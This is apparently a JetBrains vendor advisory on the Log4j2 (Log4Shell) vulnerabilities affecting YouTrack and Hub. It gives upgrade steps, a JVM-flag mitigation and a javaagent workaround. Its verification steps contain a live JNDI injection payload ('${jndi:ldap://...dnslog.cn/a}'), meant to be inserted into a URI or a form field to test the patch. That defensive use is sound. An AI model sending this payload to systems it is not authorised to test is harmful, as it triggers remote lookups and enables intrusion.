News

YouTrack update regarding Log4j2 vulnerability

Update from December 29, 2021, 16:00 (GMT +0).  The latest YouTrack and Hub versions (2021.4.36872 and 2021.1.14127 respectively) released on December 21st include log4j 2.17. To the best of our knowledge, these YouTrack and Hub versions are not affected by any known log4j-related vulnerabilities discovered to date (CVE-2021-44228, CVE-2021-45046, CVE-2021-44832 and CVE-2021-45105). Feel free to download and install these YouTrack and Hub versions.
We will no longer be updating this blog post. Any new information relating to the log4j CVEs will be published in our quarterly security bulletin. You can subscribe to the security bulletin here.

Update from December 21, 2021, 23:00 (GMT +0).  To the best of our knowledge, the newly discovered CVE-2021-45105 does not affect YouTrack or Hub.
To address another vulnerability, CVE-2021-45046, we released YouTrack 2021.4.36179 and Hub 2021.1.14108 on December 16, 2021. Please download and install these YouTrack and Hub versions. Follow the issue for more details.


Update from December 15, 2021, 21:00 (GMT +0).  We’ve found a workaround solution that lets customers without upgrade subscriptions secure their installations. Please refer to the section Securing YouTrack and Hub without upgrading below for details.
For further updates and community discussion on the topic, please follow this issue.


This announcement is about a security vulnerability that was found in a third-party library used in JetBrains YouTrack. 

YouTrack InCloud customers are already safe. We have analyzed access logs and found that no attempts were made to exploit the vulnerability before we eliminated it from YouTrack InCloud.

Administrators of some YouTrack Standalone installations must take further action to secure their instances.

Please read this announcement for a full update on the current situation and immediate action that you must take if you run a YouTrack Standalone installation.


What happened

On December 9, 2021, a security vulnerability was found in a third-party library used in JetBrains YouTrack. This security vulnerability affects YouTrack instances from version 2018.1 to version 2021.4.35732. To secure your YouTrack Standalone installation, please proceed with the steps below.

Actions for YouTrack Standalone administrators

On Friday, December 10, 2021, we sent an email to administrators of all potentially affected YouTrack Standalone instances. The email contained instructions to restart YouTrack using a parameter to disable the affected library.

It has since come to our attention that this action alone may not have been sufficient to secure some instances.

If you use YouTrack Standalone 2017.4 or earlier, you do not need to take any further action.

If you use YouTrack Standalone 2018.1 or later, please take the additional steps below to secure your YouTrack.

What actions you should take

  • If you use YouTrack Standalone 2017.4 or earlier or 2021.4.35970 or later, your installation is already safe and no additional actions are required from your side.

  • If you use YouTrack Standalone from 2018.1 to 2021.4.35732 and you have an external Hub installed, please secure your installation immediately by: 
    • upgrading YouTrack to version 2021.4.35970, and
    • upgrading Hub to version 2021.1.14080.  

      Alternatively, you can:
    • restart your YouTrack with the parameter `-Dlog4j2.formatMsgNoLookups=true`. A guide on how to apply a parameter to YouTrack can be found here (an example for Docker can be found here), and
    • restart your Hub with the parameter `-Dlog4j2.formatMsgNoLookups=true`. A guide on how to apply a parameter to Hub can be found here (an example for Docker can be found here).

      Please refer to the corresponding Hub vulnerability announcement for further details on securing your Hub installation.

  • If you use a YouTrack Standalone version from 2018.1 to 2021.2 without an external Hub, the optimal way to secure your installation is to upgrade to the latest YouTrack version 2021.4.35970

    If your upgrade subscription covers an upgrade to at least 2021.3, you can
    • upgrade to version 2021.3, and
    • restart your YouTrack with the parameter `-Dlog4j2.formatMsgNoLookups=true`. A guide on how to apply a parameter to YouTrack can be found here (an example for Docker can be found here).

  • If you use a YouTrack Standalone version from 2021.3 to 2021.4.35732 without an external Hub, please secure your installation immediately by: 
    • upgrading YouTrack to version 2021.4.35970

      Alternatively, you can:
    • restart your YouTrack with the parameter `-Dlog4j2.formatMsgNoLookups=true`. A guide on how to apply a parameter to YouTrack can be found here (an example for Docker can be found here).

Update from December 15, 2021, 21:00 (GMT +0).

Securing YouTrack and Hub without upgrading

We’ve found a solution that lets you secure any YouTrack or Hub installation without upgrading. Unfortunately, we can’t provide you with backports since it would be impossible to deliver them in a timely manner, hence the workaround. 

This workaround was checked by our QA team and should eliminate both CVE-2021-44228 and CVE-2021-45046 vulnerabilities. It requires some administration skills so please contact your system administrator to apply the patch. 

Full instructions are below.

YouTrack

Prerequisites

  1. This workaround secures any version of YouTrack installation
  2. You will need your ‘conf’ folder. If you can’t locate the installation folder, check `<your YouTrack address>/admin/statistics’ → Installation Folder. The default `conf` folder locations are:
    – ZIP: `folder_where_you_extracted_ZIP_archive\conf`
    – JAR: `${user.home}/teamsysdata/conf`
    – MSI: `%programdata%\JetBrains\YouTrack\conf`
    – Docker: /opt/youtrack/conf or conf location that is specified in the command you use to start YouTrack in Docker
  3. You will need the youtrack.jvmoptions file. It is located inside the `conf` folder. Here is a guide on how to edit the youtrack.jvmoptions file for each distribution type: https://www.jetbrains.com/help/youtrack/standalone/Configure-JVM-Options.html#set-jvm-options-manually 

Steps

  1. Stop your YouTrack
  2. Download the file and add it to the conf folder (nojndi.jar). Make sure this file has the same permissions as other files in this folder
  3. For JAR/ZIP/MSI: add the line `-javaagent:conf/nojndi.jar` to the youtrack.jvmoptions file. For Docker: add the line `-javaagent:/opt/youtrack/conf/nojndi.jar` to the youtrack.jvmoptions file
  4. Start your YouTrack

The `nojndi.jar` file mentioned above is based on the NCC Group publications and is distributed under the Apache 2 license.

How to verify 

You can check that the workaround was applied successfully and your installation is now secure by doing the following:

  1.  Go to http://dnslog.cn/ and click “Get SubDomain”. You will get a generated subdomain, for example `rigpz8.dnslog.cn`. 
  2. In your browser, make a request to YouTrack with /api/${jndi:ldap://subdomain.dnslog.cn/a} in the URI, where `subdomain` should be replaced with the subdomain that was generated for you in the previous step (in this case `rigpz8`).
    Example: `https://<your YouTrack address>/api/config/$%7Bjndi:ldap://rigpz8.dnslog.cn/a%7D`
  3. Go back to http://dnslog.cn/ and click “Refresh record”.
  4. If you don’t see new requests that means that the patch has been applied successfully.

You can also capture requests by other means (custom DNS server, Wireshark, etc).

If you need assistance from our support engineers, please note that we are experiencing a high volume of requests at the moment. If you have an expired subscription, please expect significant delays in our reply. 

For further updates and community discussion on the instruction above, please follow the issue.

External Hub

Prerequisites

  1. This workaround secures any version of Hub installation.
  2. You will need your ‘conf’ folder. The default `conf` folder locations are:
    – ZIP: “folder_where_you_extracted_ZIP_archive\conf“
    – MSI:`%programdata%\JetBrains\Hub\conf`
    – Docker: `/opt/hub/conf` or conf location that is specified in the command you use to start Hub in Docker.
  3. You will need the hub.jvmoptions file. It is located inside the `conf` folder. Here is a guide on how to edit hub.jvmoptions file for each distribution type: https://www.jetbrains.com/help/hub/Configure-JVM-Options.html#modify-jvm-options-in-file

Steps

  1. Stop your Hub
  2. Download the file and add it to the conf folder (nojndi.jar). Make sure this file has the same permissions as other files in this folder
  3. For ZIP/MSI: add the line `-javaagent:conf/nojndi.jar` to the hub.jvmoptions file;
    For Docker: add the line `-javaagent:/opt/hub/conf/nojndi.jar` to the hub.jvmoptions file
  4. Start your Hub

The `nojndi.jar` file mentioned above is based on the NCC Group publications and is distributed under the Apache 2 license.

How to verify 

You can check that the workaround was applied successfully and your installation is now secure by doing the following:

  1. Go to http://dnslog.cn/ and click “Get SubDomain”. YAs a result, you will get a generated subdomain, for example `rigpz8.dnslog.cn`.
  2. Go to your Hub -> Settings -> Groups, create a test new group with any name
  3. Navigate to the group settings and insert ${jndi:ldap://subdomain.dnslog.cn/a} into the group description field, where `subdomain` should be replaced with the subdomain that was generated for you in the previous step (in this case `rigpz8`). Click “Save”.

4. Go back to http://dnslog.cn/ and click “Refresh record”.

5. If you don’t see new requests that means that the patch has been applied successfully.

You can also capture requests by other means (custom DNS server, Wireshark, etc).

If you need assistance from our support engineers, please note that we are experiencing a high volume of requests at the moment. If you have an expired subscription, please expect significant delays in our reply. 


For further updates and community discussion on the instruction above, please follow the issue.

End of update.

What actions we’ve taken

  • We immediately took all necessary steps to secure YouTrack InCloud instances on December 10, 2021, and applied a permanent fix to protect against the vulnerability. This required unscheduled maintenance downtime that may have coincided with your business hours and interrupted your work. We apologize for any inconvenience caused. In such situations, your security is our first priority.

  • We released a security update for YouTrack (version 2021.4.35970) on December 14, 2021. Download it here and install it.
  • We released a security update for Hub (version 2021.1.14080) on December 13, 2021. Download it here and install it.   

If you need any further assistance, please contact our support or simply comment on this blog post.

Your JetBrains YouTrack team

image description